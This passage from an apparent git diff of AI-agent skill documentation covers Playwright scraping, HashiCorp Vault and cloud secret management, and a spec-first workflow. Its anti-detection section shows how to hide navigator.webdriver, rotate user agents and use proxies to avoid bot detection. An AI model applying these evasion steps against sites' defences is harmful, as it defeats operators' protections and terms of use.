    elements = await page.query_selector_all(f"{parent_selector} > .comment")
    for el in elements:
        body_el = await el.query_selector(".comment-body")
        author_el = await el.query_selector(".author")
        text = (await body_el.text_content()) if body_el else ""
        author = (await author_el.text_content()) if author_el else ""
        # Recurse into this comment's own replies container.
        replies = await extract_comments(el, ".replies")
        comments.append({
            "author": (author or "").strip(),
            "text": (text or "").strip(),
            "replies": replies
        })
    return comments
```
### 5. Cookie & Session Management
#### Save and Restore Sessions
```python
import json
# Save cookies after login
cookies = await context.cookies()
with open("session.json", "w") as f:
json.dump(cookies, f)
# Restore session in new context
with open("session.json", "r") as f:
cookies = json.load(f)
context = await browser.new_context()
await context.add_cookies(cookies)
```
#### Storage State (Cookies + Local Storage)
```python
# Save full state (cookies + localStorage + sessionStorage)
await context.storage_state(path="state.json")
# Restore full state
context = await browser.new_context(storage_state="state.json")
```
**Best practice:** Save state after login, reuse across scraping sessions. Check session validity before starting a long job — make a lightweight request to a protected page and verify you are not redirected to login.
### 6. Anti-Detection Patterns
Modern websites detect automation through multiple vectors. Address all of them:
#### User Agent Rotation
Never use the default Playwright user agent. Rotate through real browser user agents:
```python
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
```
#### Viewport and Screen Size
Set realistic viewport dimensions; Playwright's default viewport (1280x720) is a well-known automation fingerprint:
```python
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
screen={"width": 1920, "height": 1080},
user_agent=random.choice(USER_AGENTS),
)
```
#### WebDriver Flag Removal
Playwright sets `navigator.webdriver = true`. Remove it:
```python
await page.add_init_script("""
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
""")
```
#### Request Throttling
Add human-like delays between actions:
```python
import asyncio
import random
async def human_delay(min_ms=500, max_ms=2000):
    """Pause for a random, human-like interval between actions.

    Args:
        min_ms: Minimum delay in milliseconds.
        max_ms: Maximum delay in milliseconds.

    Sleeps via ``asyncio.sleep`` so the helper is self-contained — the
    original version referenced a global ``page`` object that does not
    exist inside the function, raising NameError when called elsewhere.
    """
    delay_ms = random.randint(min_ms, max_ms)
    await asyncio.sleep(delay_ms / 1000)
```
#### Proxy Support
```python
browser = await playwright.chromium.launch(
proxy={"server": "http://proxy.example.com:8080"}
)
# Or per-context:
context = await browser.new_context(
proxy={"server": "http://proxy.example.com:8080",
"username": "user", "password": "pass"}
)
```
### 7. Dynamic Content Handling
#### SPA Rendering
SPAs render content client-side. Wait for the actual content, not the page load:
```python
await page.goto(url)
# Wait for the data to render, not just the shell
await page.wait_for_selector("div.product-list article", state="attached")
```
#### AJAX / Fetch Waiting
Intercept and wait for specific API calls:
```python
async with page.expect_response("**/api/products*") as response_info:
await page.click("button.load-more")
response = await response_info.value
data = await response.json() # You can use the API data directly
```
#### Shadow DOM Traversal
```python
# Playwright pierces open Shadow DOM automatically with >>
await page.locator("custom-element >> .inner-class").click()
```
#### Lazy-Loaded Images
Scroll elements into view to trigger lazy loading:
```python
images = await page.query_selector_all("img[data-src]")
for img in images:
await img.scroll_into_view_if_needed()
await page.wait_for_timeout(200)
```
### 8. Error Handling & Retry Logic
#### Retry Decorator Pattern
```python
import asyncio
async def with_retry(coro_factory, max_retries=3, backoff_base=2):
    """Await the coroutine produced by ``coro_factory``, retrying on failure.

    Makes up to ``max_retries`` attempts with exponential backoff of
    ``backoff_base ** attempt`` seconds between attempts. The exception
    raised by the final failed attempt propagates to the caller.
    """
    final_attempt = max_retries - 1
    for attempt in range(max_retries):
        try:
            return await coro_factory()
        except Exception as exc:
            if attempt == final_attempt:
                raise
            delay = backoff_base ** attempt
            print(f"Attempt {attempt + 1} failed: {exc}. Retrying in {delay}s...")
            await asyncio.sleep(delay)
```
#### Handling Common Failures
```python
from playwright.async_api import TimeoutError as PlaywrightTimeout
try:
await page.click("button.submit", timeout=5000)
except PlaywrightTimeout:
# Element did not appear — page structure may have changed
# Try fallback selector
await page.click("[type='submit']", timeout=5000)
except Exception as e:
# Network error, browser crash, etc.
await page.screenshot(path="error-state.png")
raise
```
#### Rate Limit Detection
```python
async def check_rate_limit(response):
    """Detect an HTTP 429 response and wait out the advertised backoff.

    Args:
        response: Playwright Response (anything exposing ``status`` and a
            ``headers`` mapping).

    Returns:
        True if the response was rate-limited (after sleeping), else False.
    """
    if response.status != 429:
        return False
    retry_after = response.headers.get("retry-after", "60")
    try:
        wait_seconds = int(retry_after)
    except ValueError:
        # RFC 9110 allows Retry-After to be an HTTP-date rather than
        # seconds; fall back to a fixed wait instead of crashing.
        wait_seconds = 60
    print(f"Rate limited. Waiting {wait_seconds}s...")
    await asyncio.sleep(wait_seconds)
    return True
```
## Workflows
### Workflow 1: Single-Page Data Extraction
**Scenario:** Extract product data from a single page with JavaScript-rendered content.
**Steps:**
1. Launch browser in headed mode during development (`headless=False`), switch to headless for production
2. Navigate to URL and wait for content selector
3. Extract data using `query_selector_all` with field mapping
4. Validate extracted data (check for nulls, expected types)
5. Output as JSON
```python
async def extract_single_page(url, selectors):
    """Scrape a single JavaScript-rendered page into structured data.

    Args:
        url: Page to scrape.
        selectors: {"container": card selector, "fields": field map
            understood by ``extract_listings``}.

    Returns:
        List of dicts extracted from the rendered page.
    """
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        # try/finally guarantees the browser is closed even if navigation
        # or extraction raises — see the "Not Cleaning Up Browser
        # Instances" anti-pattern below.
        try:
            context = await browser.new_context(
                viewport={"width": 1920, "height": 1080},
                user_agent="Mozilla/5.0 ..."
            )
            page = await context.new_page()
            # networkidle waits for XHR/fetch traffic to settle so SPA
            # content is actually rendered before extraction.
            await page.goto(url, wait_until="networkidle")
            return await extract_listings(page, selectors["container"], selectors["fields"])
        finally:
            await browser.close()
```
### Workflow 2: Multi-Page Scraping with Pagination
**Scenario:** Scrape search results across 50+ pages.
**Steps:**
1. Launch browser with anti-detection settings
2. Navigate to first page
3. Extract data from current page
4. Check if "Next" button exists and is enabled
5. Click next, wait for new content to load (not just navigation)
6. Repeat until no next page or max pages reached
7. Deduplicate results by unique key
8. Write output incrementally (don't hold everything in memory)
```python
async def scrape_paginated(base_url, selectors, max_pages=100):
    """Scrape listing data across paginated search results.

    Args:
        base_url: First results page.
        selectors: {"container": card selector, "fields": field map,
            "next_button": selector for the pagination control}.
        max_pages: Hard cap on pages visited.

    Returns:
        Accumulated list of extracted items.
    """
    all_data = []
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        # try/finally ensures the browser is closed on any failure —
        # see the "Not Cleaning Up Browser Instances" anti-pattern below.
        try:
            context = await browser.new_context()
            page = await context.new_page()
            await page.goto(base_url)
            for _ in range(max_pages):
                items = await extract_listings(page, selectors["container"], selectors["fields"])
                all_data.extend(items)
                next_btn = page.locator(selectors["next_button"])
                # Stop when there is no next button or it is disabled.
                if await next_btn.count() == 0 or await next_btn.is_disabled():
                    break
                await next_btn.click()
                # Wait for fresh content to render, not just navigation.
                await page.wait_for_selector(selectors["container"])
                await human_delay(800, 2000)
        finally:
            await browser.close()
    return all_data
```
### Workflow 3: Authenticated Workflow Automation
**Scenario:** Log into a portal, navigate a multi-step form, download a report.
**Steps:**
1. Check for existing session state file
2. If no session, perform login and save state
3. Navigate to target page using saved session
4. Fill multi-step form with provided data
5. Wait for download to trigger
6. Save downloaded file to target directory
```python
async def authenticated_workflow(credentials, form_data, download_dir):
    """Log in (reusing saved session state when present), fill a multi-step
    form, and save the resulting report download.

    Args:
        credentials: {"url", "user", "pass"} for the login flow.
        form_data: Step field values plus "target_url" for the form page.
        download_dir: Directory where the downloaded report is saved.
    """
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        state_file = "session_state.json"
        # try/finally ensures the browser is closed on any failure —
        # see the "Not Cleaning Up Browser Instances" anti-pattern below.
        try:
            # Reuse an existing session when available; otherwise log in
            # and persist the storage state for subsequent runs.
            if os.path.exists(state_file):
                context = await browser.new_context(storage_state=state_file)
            else:
                context = await browser.new_context()
                page = await context.new_page()
                await login(page, credentials["url"], credentials["user"], credentials["pass"])
                await context.storage_state(path=state_file)
            page = await context.new_page()
            await page.goto(form_data["target_url"])
            # Fill form steps in order.
            for step_fn in [fill_step_1, fill_step_2]:
                await step_fn(page, form_data)
            # Trigger and capture the report download.
            async with page.expect_download() as dl_info:
                await page.click("button:has-text('Download Report')")
            download = await dl_info.value
            await download.save_as(os.path.join(download_dir, download.suggested_filename))
        finally:
            await browser.close()
```
## Tools Reference
| Script | Purpose | Key Flags | Output |
|--------|---------|-----------|--------|
| `scraping_toolkit.py` | Generate Playwright scraping script skeleton | `--url`, `--selectors`, `--paginate`, `--output` | Python script or JSON config |
| `form_automation_builder.py` | Generate form-fill automation script from field spec | `--fields`, `--url`, `--output` | Python automation script |
| `anti_detection_checker.py` | Audit a Playwright script for detection vectors | `--file`, `--verbose` | Risk report with score |
All scripts are stdlib-only. Run `python3 <script> --help` for full usage.
## Anti-Patterns
### Hardcoded Waits
**Bad:** `await page.wait_for_timeout(5000)` before every action.
**Good:** Use `wait_for_selector`, `wait_for_url`, `expect_response`, or `wait_for_load_state`. Hardcoded waits are flaky and slow.
### No Error Recovery
**Bad:** Linear script that crashes on first failure.
**Good:** Wrap each page interaction in try/except. Take error-state screenshots. Implement retry with exponential backoff.
### Ignoring robots.txt
**Bad:** Scraping without checking robots.txt directives.
**Good:** Fetch and parse robots.txt before scraping. Respect `Crawl-delay`. Skip disallowed paths. Add your bot name to User-Agent if running at scale.
### Storing Credentials in Scripts
**Bad:** Hardcoding usernames and passwords in Python files.
**Good:** Use environment variables, `.env` files (gitignored), or a secrets manager. Pass credentials via CLI arguments.
### No Rate Limiting
**Bad:** Hammering a site with 100 requests/second.
**Good:** Add random delays between requests (1-3s for polite scraping). Monitor for 429 responses. Implement exponential backoff.
### Selector Fragility
**Bad:** Relying on auto-generated class names (`.css-1a2b3c`) or deep nesting (`div > div > div > span:nth-child(3)`).
**Good:** Use data attributes, semantic HTML, or text-based locators. Test selectors in browser DevTools first.
### Not Cleaning Up Browser Instances
**Bad:** Launching browsers without closing them, leading to resource leaks.
**Good:** Always use `try/finally` or async context managers to ensure `browser.close()` is called.
### Running Headed in Production
**Bad:** Using `headless=False` in production/CI.
**Good:** Develop with headed mode for debugging, deploy with `headless=True`. Use environment variable to toggle: `headless = os.environ.get("HEADLESS", "true") == "true"`.
## Cross-References
- **playwright-pro** — Browser testing skill. Use for E2E tests, test assertions, test fixtures. Browser Automation is for data extraction and workflow automation, not testing.
- **api-test-suite-builder** — When the website has a public API, hit the API directly instead of scraping the rendered page. Faster, more reliable, less detectable.
- **performance-profiler** — If your automation scripts are slow, profile the bottlenecks before adding concurrency.
- **env-secrets-manager** — For securely managing credentials used in authenticated automation workflows.

View File

@@ -1,13 +1,13 @@
---
title: "Engineering - POWERFUL Skills — Agent Skills & Codex Plugins"
description: "44 engineering - powerful skills — advanced agent-native skill and Claude Code plugin for AI agent design, infrastructure, and automation. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
description: "46 engineering - powerful skills — advanced agent-native skill and Claude Code plugin for AI agent design, infrastructure, and automation. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
---
<div class="domain-header" markdown>
# :material-rocket-launch: Engineering - POWERFUL
<p class="domain-count">44 skills in this domain</p>
<p class="domain-count">46 skills in this domain</p>
</div>
@@ -53,6 +53,12 @@ description: "44 engineering - powerful skills — advanced agent-native skill a
> You sleep. The agent experiments. You wake up to results.
- **[Browser Automation - POWERFUL](browser-automation.md)**
---
The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation ...
- **[Changelog Generator](changelog-generator.md)**
---
@@ -185,6 +191,12 @@ description: "44 engineering - powerful skills — advanced agent-native skill a
Tier: POWERFUL
- **[Secrets Vault Manager](secrets-vault-manager.md)**
---
Tier: POWERFUL
- **[Skill Security Auditor](skill-security-auditor.md)**
---
@@ -197,6 +209,18 @@ description: "44 engineering - powerful skills — advanced agent-native skill a
---
- **[Spec-Driven Workflow — POWERFUL](spec-driven-workflow.md)**
---
Spec-driven workflow enforces a single, non-negotiable rule: write the specification BEFORE you write any code. Not a...
- **[SQL Database Assistant - POWERFUL Tier Skill](sql-database-assistant.md)**
---
The operational companion to database design. While database-designer focuses on schema architecture and database-sch...
- **[Tech Debt Tracker](tech-debt-tracker.md)**
---

View File

@@ -0,0 +1,414 @@
---
title: "Secrets Vault Manager — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Secrets Vault Manager
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `secrets-vault-manager`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/secrets-vault-manager/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** Security / Infrastructure / DevOps
---
## Overview
Production secret infrastructure management for teams running HashiCorp Vault, cloud-native secret stores, or hybrid architectures. This skill covers policy authoring, auth method configuration, automated rotation, dynamic secrets, audit logging, and incident response.
**Distinct from env-secrets-manager** which handles local `.env` file hygiene and leak detection. This skill operates at the infrastructure layer — Vault clusters, cloud KMS, certificate authorities, and CI/CD secret injection.
### When to Use
- Standing up a new Vault cluster or migrating to a managed secret store
- Designing auth methods for services, CI runners, and human operators
- Implementing automated credential rotation (database, API keys, certificates)
- Auditing secret access patterns for compliance (SOC 2, ISO 27001, HIPAA)
- Responding to a secret leak that requires mass revocation
- Integrating secrets into Kubernetes workloads or CI/CD pipelines
---
## HashiCorp Vault Patterns
### Architecture Decisions
| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Deployment mode | HA with Raft storage | No external dependency, built-in leader election |
| Auto-unseal | Cloud KMS (AWS KMS / Azure Key Vault / GCP KMS) | Eliminates manual unseal, enables automated restarts |
| Namespaces | One per environment (dev/staging/prod) | Blast-radius isolation, independent policies |
| Audit devices | File + syslog (dual) | Vault refuses requests if all audit devices fail — dual prevents outages |
### Auth Methods
**AppRole** — Machine-to-machine authentication for services and batch jobs.
```hcl
# Enable AppRole
path "auth/approle/*" {
capabilities = ["create", "read", "update", "delete", "list"]
}
# Application-specific role
vault write auth/approle/role/payment-service \
token_ttl=1h \
token_max_ttl=4h \
secret_id_num_uses=1 \
secret_id_ttl=10m \
token_policies="payment-service-read"
```
**Kubernetes** — Pod-native authentication via service account tokens.
```hcl
vault write auth/kubernetes/role/api-server \
bound_service_account_names=api-server \
bound_service_account_namespaces=production \
policies=api-server-secrets \
ttl=1h
```
**OIDC** — Human operator access via SSO provider (Okta, Azure AD, Google Workspace).
```hcl
vault write auth/oidc/role/engineering \
bound_audiences="vault" \
allowed_redirect_uris="https://vault.example.com/ui/vault/auth/oidc/oidc/callback" \
user_claim="email" \
oidc_scopes="openid,profile,email" \
policies="engineering-read" \
ttl=8h
```
### Secret Engines
| Engine | Use Case | TTL Strategy |
|--------|----------|-------------|
| KV v2 | Static secrets (API keys, config) | Versioned, manual rotation |
| Database | Dynamic DB credentials | 1h default, 24h max |
| PKI | TLS certificates | 90d leaf certs, 5y intermediate CA |
| Transit | Encryption-as-a-service | Key rotation every 90d |
| SSH | Signed SSH certificates | 30m for interactive, 8h for automation |
### Policy Design
Follow least-privilege with path-based granularity:
```hcl
# payment-service-read policy
path "secret/data/production/payment/*" {
capabilities = ["read"]
}
path "database/creds/payment-readonly" {
capabilities = ["read"]
}
# Deny access to admin paths explicitly
path "sys/*" {
capabilities = ["deny"]
}
```
**Policy naming convention:** `{service}-{access-level}` (e.g., `payment-service-read`, `api-gateway-admin`).
---
## Cloud Secret Store Integration
### Comparison Matrix
| Feature | AWS Secrets Manager | Azure Key Vault | GCP Secret Manager |
|---------|--------------------|-----------------|--------------------|
| Rotation | Built-in Lambda | Custom logic via Functions | Cloud Functions |
| Versioning | Automatic | Manual or automatic | Automatic |
| Encryption | AWS KMS (default or CMK) | HSM-backed | Google-managed or CMEK |
| Access control | IAM policies + resource policy | RBAC + Access Policies | IAM bindings |
| Cross-region | Replication supported | Geo-redundant by default | Replication supported |
| Audit | CloudTrail | Azure Monitor + Diagnostic Logs | Cloud Audit Logs |
| Pricing model | Per-secret + per-API call | Per-operation + per-key | Per-secret version + per-access |
### When to Use Which
- **AWS Secrets Manager**: RDS/Aurora credential rotation out of the box. Best when fully on AWS.
- **Azure Key Vault**: Certificate management strength. Required for Azure AD integrated workloads.
- **GCP Secret Manager**: Simplest API surface. Best for GKE-native workloads with Workload Identity.
- **HashiCorp Vault**: Multi-cloud, dynamic secrets, PKI, transit encryption. Best for complex or hybrid environments.
### SDK Access Patterns
**Principle:** Always fetch secrets at startup or via sidecar — never bake into images or config files.
```python
# AWS Secrets Manager pattern
import boto3, json
def get_secret(secret_name, region="us-east-1"):
client = boto3.client("secretsmanager", region_name=region)
response = client.get_secret_value(SecretId=secret_name)
return json.loads(response["SecretString"])
```
```python
# GCP Secret Manager pattern
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
client = secretmanager.SecretManagerServiceClient()
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
response = client.access_secret_version(request={"name": name})
return response.payload.data.decode("UTF-8")
```
```python
# Azure Key Vault pattern
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
def get_secret(vault_url, secret_name):
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
return client.get_secret(secret_name).value
```
---
## Secret Rotation Workflows
### Rotation Strategy by Secret Type
| Secret Type | Rotation Frequency | Method | Downtime Risk |
|-------------|-------------------|--------|---------------|
| Database passwords | 30 days | Dual-account swap | Zero (A/B rotation) |
| API keys | 90 days | Generate new, deprecate old | Zero (overlap window) |
| TLS certificates | 60 days before expiry | ACME or Vault PKI | Zero (graceful reload) |
| SSH keys | 90 days | Vault-signed certificates | Zero (CA-based) |
| Service tokens | 24 hours | Dynamic generation | Zero (short-lived) |
| Encryption keys | 90 days | Key versioning (rewrap) | Zero (version coexistence) |
### Database Credential Rotation (Dual-Account)
1. Two database accounts exist: `app_user_a` and `app_user_b`
2. Application currently uses `app_user_a`
3. Rotation rotates `app_user_b` password, updates secret store
4. Application switches to `app_user_b` on next credential fetch
5. After grace period, `app_user_a` password is rotated
6. Cycle repeats
### API Key Rotation (Overlap Window)
1. Generate new API key with provider
2. Store new key in secret store as `current`, move old to `previous`
3. Deploy applications — they read `current`
4. After all instances restarted (or TTL expired), revoke `previous`
5. Monitoring confirms zero usage of old key before revocation
---
## Dynamic Secrets
Dynamic secrets are generated on-demand with automatic expiration. Prefer dynamic secrets over static credentials wherever possible.
### Database Dynamic Credentials (Vault)
```hcl
# Configure database engine
vault write database/config/postgres \
plugin_name=postgresql-database-plugin \
connection_url="postgresql://{{username}}:{{password}}@db.example.com:5432/app" \
allowed_roles="app-readonly,app-readwrite" \
username="vault_admin" \
password="<admin-password>"
# Create role with TTL
vault write database/roles/app-readonly \
db_name=postgres \
creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
default_ttl=1h \
max_ttl=24h
```
### Cloud IAM Dynamic Credentials
Vault can generate short-lived AWS IAM credentials, Azure service principal passwords, or GCP service account keys — eliminating long-lived cloud credentials entirely.
### SSH Certificate Authority
Replace SSH key distribution with a Vault-signed certificate model:
1. Vault acts as SSH CA
2. Users/machines request signed certificates with short TTL (30 min)
3. SSH servers trust the CA public key — no `authorized_keys` management
4. Certificates expire automatically — no revocation needed for normal operations
---
## Audit Logging
### What to Log
| Event | Priority | Retention |
|-------|----------|-----------|
| Secret read access | HIGH | 1 year minimum |
| Secret creation/update | HIGH | 1 year minimum |
| Auth method login | MEDIUM | 90 days |
| Policy changes | CRITICAL | 2 years (compliance) |
| Failed access attempts | CRITICAL | 1 year |
| Token creation/revocation | MEDIUM | 90 days |
| Seal/unseal operations | CRITICAL | Indefinite |
### Anomaly Detection Signals
- Secret accessed from new IP/CIDR range
- Access volume spike (>3x baseline for a path)
- Off-hours access for human auth methods
- Service accessing secrets outside its policy scope (denied requests)
- Multiple failed auth attempts from single source
- Token created with unusually long TTL
### Compliance Reporting
Generate periodic reports covering:
1. **Access inventory** — Which identities accessed which secrets, when
2. **Rotation compliance** — Secrets overdue for rotation
3. **Policy drift** — Policies modified since last review
4. **Orphaned secrets** — Secrets with no recent access (>90 days)
Use `audit_log_analyzer.py` to parse Vault or cloud audit logs for these signals.
---
## Emergency Procedures
### Secret Leak Response (Immediate)
**Time target: Contain within 15 minutes of detection.**
1. **Identify scope** — Which secret(s) leaked, where (repo, log, error message, third party)
2. **Revoke immediately** — Rotate the compromised credential at the source (provider API, Vault, cloud SM)
3. **Invalidate tokens** — Revoke all Vault tokens that accessed the leaked secret
4. **Audit blast radius** — Query audit logs for usage of the compromised secret in the exposure window
5. **Notify stakeholders** — Security team, affected service owners, compliance (if PII/regulated data)
6. **Post-mortem** — Document root cause, update controls to prevent recurrence
### Vault Seal Operations
**When to seal:** Active security incident affecting Vault infrastructure, suspected key compromise.
**Sealing** stops all Vault operations. Use only as last resort.
**Unseal procedure:**
1. Gather quorum of unseal key holders (Shamir threshold)
2. Or confirm auto-unseal KMS key is accessible
3. Unseal via `vault operator unseal` or restart with auto-unseal
4. Verify audit devices reconnected
5. Check active leases and token validity
See `references/emergency_procedures.md` for complete playbooks.
---
## CI/CD Integration
### Vault Agent Sidecar (Kubernetes)
Vault Agent runs alongside application pods, handles authentication and secret rendering:
```yaml
# Pod annotation for Vault Agent Injector
annotations:
vault.hashicorp.com/agent-inject: "true"
vault.hashicorp.com/role: "api-server"
vault.hashicorp.com/agent-inject-secret-db: "database/creds/app-readonly"
vault.hashicorp.com/agent-inject-template-db: |
{{- with secret "database/creds/app-readonly" -}}
postgresql://{{ .Data.username }}:{{ .Data.password }}@db:5432/app
{{- end }}
```
### External Secrets Operator (Kubernetes)
For teams preferring declarative GitOps over agent sidecars:
```yaml
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
name: api-credentials
spec:
refreshInterval: 1h
secretStoreRef:
name: vault-backend
kind: ClusterSecretStore
target:
name: api-credentials
data:
- secretKey: api-key
remoteRef:
key: secret/data/production/api
property: key
```
### GitHub Actions OIDC
Eliminate long-lived secrets in CI by using OIDC federation:
```yaml
- name: Authenticate to Vault
uses: hashicorp/vault-action@v2
with:
url: https://vault.example.com
method: jwt
role: github-ci
jwtGithubAudience: https://vault.example.com
secrets: |
secret/data/ci/deploy api_key | DEPLOY_API_KEY ;
secret/data/ci/deploy db_password | DB_PASSWORD
```
---
## Anti-Patterns
| Anti-Pattern | Risk | Correct Approach |
|-------------|------|-----------------|
| Hardcoded secrets in source code | Leak via repo, logs, error output | Fetch from secret store at runtime |
| Long-lived static tokens (>30 days) | Stale credentials, no accountability | Dynamic secrets or short TTL + rotation |
| Shared service accounts | No audit trail per consumer | Per-service identity with unique credentials |
| No rotation policy | Compromised creds persist indefinitely | Automated rotation on schedule |
| Secrets in environment variables on CI | Visible in build logs, process table | Vault Agent or OIDC-based injection |
| Single unseal key holder | Bus factor of 1, recovery blocked | Shamir split (3-of-5) or auto-unseal |
| No audit device configured | Zero visibility into access | Dual audit devices (file + syslog) |
| Wildcard policies (`path "*"`) | Over-permissioned, violates least privilege | Explicit path-based policies per service |
---
## Tools
| Script | Purpose |
|--------|---------|
| `vault_config_generator.py` | Generate Vault policy and auth config from application requirements |
| `rotation_planner.py` | Create rotation schedule from a secret inventory file |
| `audit_log_analyzer.py` | Analyze audit logs for anomalies and compliance gaps |
---
## Cross-References
- **env-secrets-manager** — Local `.env` file hygiene, leak detection, drift awareness
- **senior-secops** — Security operations, incident response, threat modeling
- **ci-cd-pipeline-builder** — Pipeline design where secrets are consumed
- **docker-development** — Container secret injection patterns
- **helm-chart-builder** — Kubernetes secret management in Helm charts

View File

@@ -0,0 +1,597 @@
---
title: "Spec-Driven Workflow — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, or generate tests from acceptance criteria. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Spec-Driven Workflow
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `spec-driven-workflow`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/spec-driven-workflow/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
## Overview
Spec-driven workflow enforces a single, non-negotiable rule: **write the specification BEFORE you write any code.** Not alongside. Not after. Before.
This is not documentation. This is a contract. A spec defines what the system MUST do, what it SHOULD do, and what it explicitly WILL NOT do. Every line of code you write traces back to a requirement in the spec. Every test traces back to an acceptance criterion. If it is not in the spec, it does not get built.
### Why Spec-First Matters
1. **Eliminates rework.** 60-80% of defects originate from requirements, not implementation. Catching ambiguity in a spec costs minutes; catching it in production costs days.
2. **Forces clarity.** If you cannot write what the system should do in plain language, you do not understand the problem well enough to write code.
3. **Enables parallelism.** Once a spec is approved, frontend, backend, QA, and documentation can all start simultaneously.
4. **Creates accountability.** The spec is the definition of done. No arguments about whether a feature is "complete" — either it satisfies the acceptance criteria or it does not.
5. **Feeds TDD directly.** Acceptance criteria in Given/When/Then format translate 1:1 into test cases. The spec IS the test plan.
### The Iron Law
```
NO CODE WITHOUT AN APPROVED SPEC.
NO EXCEPTIONS. NO "QUICK PROTOTYPES." NO "I'LL DOCUMENT IT LATER."
```
If the spec is not written, reviewed, and approved, implementation does not begin. Period.
---
## The Spec Format
Every spec follows this structure. No sections are optional — if a section does not apply, write "N/A — [reason]" so reviewers know it was considered, not forgotten.
### 1. Title and Context
```markdown
# Spec: [Feature Name]
**Author:** [name]
**Date:** [ISO 8601]
**Status:** Draft | In Review | Approved | Superseded
**Reviewers:** [list]
**Related specs:** [links]
## Context
[Why does this feature exist? What problem does it solve? What is the business
motivation? Include links to user research, support tickets, or metrics that
justify this work. 2-4 paragraphs maximum.]
```
### 2. Functional Requirements (RFC 2119)
Use RFC 2119 keywords precisely:
| Keyword | Meaning |
|---------|---------|
| **MUST** | Absolute requirement. Failing this means the implementation is non-conformant. |
| **MUST NOT** | Absolute prohibition. Doing this means the implementation is broken. |
| **SHOULD** | Recommended. May be omitted with documented justification. |
| **SHOULD NOT** | Discouraged. May be included with documented justification. |
| **MAY** | Optional. Purely at the implementer's discretion. |
```markdown
## Functional Requirements
- FR-1: The system MUST authenticate users via OAuth 2.0 PKCE flow.
- FR-2: The system MUST reject tokens older than 24 hours.
- FR-3: The system SHOULD support refresh token rotation.
- FR-4: The system MAY cache user profiles for up to 5 minutes.
- FR-5: The system MUST NOT store plaintext passwords under any circumstance.
```
Number every requirement. Use `FR-` prefix. Each requirement is a single, testable statement.
### 3. Non-Functional Requirements
```markdown
## Non-Functional Requirements
### Performance
- NFR-P1: Login flow MUST complete in < 500ms (p95) under normal load.
- NFR-P2: Token validation MUST complete in < 50ms (p99).
### Security
- NFR-S1: All tokens MUST be transmitted over TLS 1.2+.
- NFR-S2: The system MUST rate-limit login attempts to 5/minute per IP.
### Accessibility
- NFR-A1: Login form MUST meet WCAG 2.1 AA standards.
- NFR-A2: Error messages MUST be announced to screen readers.
### Scalability
- NFR-SC1: The system SHOULD handle 10,000 concurrent sessions.
### Reliability
- NFR-R1: The authentication service MUST maintain 99.9% uptime.
```
### 4. Acceptance Criteria (Given/When/Then)
Every functional requirement maps to one or more acceptance criteria. Use Gherkin syntax:
```markdown
## Acceptance Criteria
### AC-1: Successful login (FR-1)
Given a user with valid credentials
When they submit the login form with correct email and password
Then they receive a valid access token
And they are redirected to the dashboard
And the login event is logged with timestamp and IP
### AC-2: Expired token rejection (FR-2)
Given a user with an access token issued 25 hours ago
When they make an API request with that token
Then they receive a 401 Unauthorized response
And the response body contains error code "TOKEN_EXPIRED"
And they are NOT redirected (API clients handle their own flow)
### AC-3: Rate limiting (NFR-S2)
Given an IP address that has made 5 failed login attempts in the last minute
When a 6th login attempt arrives from that IP
Then the request is rejected with 429 Too Many Requests
And the response includes a Retry-After header
```
### 5. Edge Cases and Error Scenarios
```markdown
## Edge Cases
- EC-1: User submits login form with empty email → Show validation error, do not hit API.
- EC-2: OAuth provider is down → Show "Service temporarily unavailable", retry after 30s.
- EC-3: User has account but no password (social-only) → Redirect to social login.
- EC-4: Concurrent login from two devices → Both sessions are valid (no single-session enforcement).
- EC-5: Token expires mid-request → Complete the current request, return warning header.
```
### 6. API Contracts
Define request/response shapes using TypeScript-style notation:
```markdown
## API Contracts
### POST /api/auth/login
Request:
```typescript
interface LoginRequest {
email: string; // MUST be valid email format
password: string; // MUST be 8-128 characters
rememberMe?: boolean; // Default: false
}
```
Success Response (200):
```typescript
interface LoginResponse {
accessToken: string; // JWT, expires in 24h
refreshToken: string; // Opaque, expires in 30d
